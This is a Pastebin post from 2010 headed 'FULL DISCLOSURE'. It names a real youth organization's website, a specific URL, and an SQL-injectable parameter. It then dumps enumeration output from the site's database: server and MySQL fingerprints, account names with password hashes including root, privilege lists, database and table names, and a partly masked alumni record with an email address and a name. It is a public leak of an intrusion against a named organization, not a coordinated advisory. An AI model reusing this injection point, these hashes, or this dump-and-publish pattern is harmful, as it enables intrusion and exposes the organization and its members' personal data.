API tools faq
paste
Advertisement
Guest User

None

a guest
Apr 8th, 2010
650
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.55 KB | None | 0 0
raw download clone embed print report
  1. -FULL DISCLOSURE- www.demolay.org
  2.  
  3. DeMolay is an organization dedicated to preparing young men to lead successful, happy, and productive lives. Basing its approach on timeless principles and practical, hands-on experience, DeMolay opens doors for young men aged 12 to 21 by developing the civic awareness, personal responsibility and leadership skills so vitally needed in society today. DeMolay combines this serious mission with a fun approach that builds important bonds of friendship among members in more than 1,000 chapters worldwide.
  4.  
  5. Vulnerable URL
  6. http://www.demolay.org:80/downloads/?did=14&dc=1&gid=28
  7.  
  8. parameter 'dc' is single quoted string injectable with 0 parenthesis
  9.  
  10.  
  11. web server operating system: Linux CentOS
  12. web application technology: Apache 2.2.3, PHP 5.2.5
  13. back-end DBMS: active fingerprint: MySQL >= 5.0.11 and < 5.0.38
  14. comment injection fingerprint: MySQL 5.0.22
  15.  
  16. -USERS-
  17. [*] demolaymain [1]:
  18. password hash: *--AA29E4C6615AFE25590A7C8D9FE3A7EFBE0DB1
  19. [*] demolaystore [1]:
  20. password hash: *--6E4AEACE071A361F298069A73B5514E3D73B69
  21. [*] phpmyadmin [1]:
  22. password hash: *--70F98E1DB61D40CA548233F5C4A38A476F01FB
  23. [*] root [1]:
  24. password hash: *--2FE046CCB5B58A9A50E6CAD5659FC7EC7EB10B
  25.  
  26. -PRIVILEGES-
  27. [*] 'demolaymain'@'localhost' [9]:
  28. privilege: ALTER
  29. privilege: CREATE
  30. privilege: CREATE TEMPORARY TABLES
  31. privilege: DELETE
  32. privilege: DROP
  33. privilege: INDEX
  34. privilege: INSERT
  35. privilege: SELECT
  36. privilege: UPDATE
  37. [*] 'demolaystore'@'localhost' [7]:
  38. privilege: CREATE
  39. privilege: CREATE TEMPORARY TABLES
  40. privilege: DELETE
  41. privilege: DROP
  42. privilege: INSERT
  43. privilege: SELECT
  44. privilege: UPDATE
  45. [*] 'phpmyadmin'@'localhost' [1]:
  46. privilege: USAGE
  47. [*] 'root'@'localhost' (administrator) [25]:
  48. privilege: ALTER
  49. privilege: ALTER ROUTINE
  50. privilege: CREATE
  51. privilege: CREATE ROUTINE
  52. privilege: CREATE TEMPORARY TABLES
  53. privilege: CREATE USER
  54. privilege: CREATE VIEW
  55. privilege: DELETE
  56. privilege: DROP
  57. privilege: EXECUTE
  58. privilege: FILE
  59. privilege: INDEX
  60. privilege: INSERT
  61. privilege: LOCK TABLES
  62. privilege: PROCESS
  63. privilege: REFERENCES
  64. privilege: RELOAD
  65. privilege: REPLICATION CLIENT
  66. privilege: REPLICATION SLAVE
  67. privilege: SELECT
  68. privilege: SHOW DATABASES
  69. privilege: SHOW VIEW
  70. privilege: SHUTDOWN
  71. privilege: SUPER
  72. privilege: UPDATE
  73. [*] 'root'@'s59.lc.hostirian.com' (administrator) [25]:
  74. privilege: ALTER
  75. privilege: ALTER ROUTINE
  76. privilege: CREATE
  77. privilege: CREATE ROUTINE
  78. privilege: CREATE TEMPORARY TABLES
  79. privilege: CREATE USER
  80. privilege: CREATE VIEW
  81. privilege: DELETE
  82. privilege: DROP
  83. privilege: EXECUTE
  84. privilege: FILE
  85. privilege: INDEX
  86. privilege: INSERT
  87. privilege: LOCK TABLES
  88. privilege: PROCESS
  89. privilege: REFERENCES
  90. privilege: RELOAD
  91. privilege: REPLICATION CLIENT
  92. privilege: REPLICATION SLAVE
  93. privilege: SELECT
  94. privilege: SHOW DATABASES
  95. privilege: SHOW VIEW
  96. privilege: SHUTDOWN
  97. privilege: SUPER
  98. privilege: UPDATE
  99.  
  100. -DATABASES-
  101. [*] DEMOLAY
  102. [*] DEMOLAY_DEV
  103. [*] DEMOLAY_OLDSTORE
  104. [*] DEMOLAY_STORE
  105. [*] information_schema
  106. [*] jeff
  107. [*] mysql
  108. [*] phpmyadmin
  109. [*] test
  110. [*] widget_corp
  111.  
  112. -TABLES FROM PHPMYADMIN-
  113. +---------------------+
  114. | pma_bookmark |
  115. | pma_column_info |
  116. | pma_designer_coords |
  117. | pma_history |
  118. | pma_pdf_pages |
  119. | pma_relation |
  120. | pma_table_coords |
  121. | pma_table_info |
  122. | pma_tracking |
  123. +---------------------+
  124.  
  125. -TABLES FROM DEMOLAY-
  126. +---------------------------------+
  127. | ADVISOR_TYPE |
  128. | ALERTS |
  129. | ALUMNI_APPLICATION |
  130. | ARTICLES |
  131. | ARTICLES_INDEX |
  132. | BLOGS |
  133. | CALENDAR_EVENTS |
  134. | CALENDAR_LIST |
  135. | CHAPTER_TYPES |
  136. | CHAPTERS |
  137. | CHAPTERS_STATUS |
  138. | CHAT_QUESTIONS |
  139. | CHATS |
  140. | COUNTRIES |
  141. | DOCUMENT |
  142. | DOCUMENT_GROUP |
  143. | EMAIL_VERIFICATION |
  144. | FEATURED_ITEMS |
  145. | FEATURED_ITEMS_INDEX |
  146. | FEEDBACK |
  147. | FEEDBACK_STATUS |
  148. | FORUM_LAST_VIEWED |
  149. | FORUM_POSTS |
  150. | FORUM_THREADS |
  151. | FORUMS |
  152. | HALL_OF_FAME |
  153. | ISC_SESSION_ADDITIONAL_MASTER |
  154. | ISC_SESSION_ADDITIONAL_OPTIONS |
  155. | ISC_SESSION_AGE_OPTIONS |
  156. | ISC_SESSION_CONGRESS_ACTIVITY |
  157. | ISC_SESSION_GOLF_TOURNEY |
  158. | ISC_SESSION_HOST_CITY |
  159. | ISC_SESSION_HOTEL_INFO |
  160. | ISC_SESSION_MEAL_MASTER |
  161. | ISC_SESSION_MEAL_OPTIONS |
  162. | ISC_SESSION_MEAL_TYPES |
  163. | ISC_SESSION_PACKAGE_MASTER |
  164. | ISC_SESSION_PACKAGE_OPTIONS |
  165. | ISC_SESSION_PACKAGE_TYPES |
  166. | ISC_SESSION_PAYMENT_TYPES |
  167. | ISC_SESSION_PRINT_REGISTRATIONS |
  168. | ISC_SESSION_RAWFORM_LOGS |
  169. | ISC_SESSION_REGISTRANTS_MASTER |
  170. | ISC_SESSION_REGISTRATION_GROUPS |
  171. | ISC_SESSION_REGISTRATION_MASTER |
  172. | ISC_SESSION_REGISTRATION_TYPES |
  173. | ISC_SESSION_RELATION_TYPES |
  174. | ISC_SESSION_ROOM_MASTER |
  175. | ISC_SESSION_ROOM_OPTIONS |
  176. | ISC_SESSION_YEARS |
  177. | JURISDICTION_CONTACT |
  178. | JURISDICTIONS |
  179. | MEMBER_DETAILS |
  180. | MY_CONTACTS |
  181. | NAVIGATION |
  182. | NAVIGATION_LEVELS |
  183. | ONLINE_APPLICATION |
  184. | ONLINE_GIVING |
  185. | PERMISSION_MASTER |
  186. | PRIVATE_MESSAGES |
  187. | PROVINCES |
  188. | SESSION |
  189. | SESSION_ACTIVITY |
  190. | STATE |
  191. | UPLOAD_STATUS |
  192. | USER_MASTER |
  193. | USER_PERMISSION_ADD |
  194. | USER_PERMISSION_REVOKE |
  195. | USER_PROFILE |
  196. | USER_STATUS |
  197. | USER_TITLE |
  198. | USER_TYPE |
  199. | VIDEO_INDEX |
  200. | WORK_GROUP |
  201. | WORK_GROUP_PERMISSION |
  202. +---------------------------------+
  203.  
  204. -FROM TABLE ALUMNI_APPLICATION-
  205.  
  206. From table "ALUMNI_APPLICATION"
  207.  
  208. r*****.****@fe.navy.mil
  209. 2009-**-30 23:33:06
  210. R***** *. ****, PMC
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!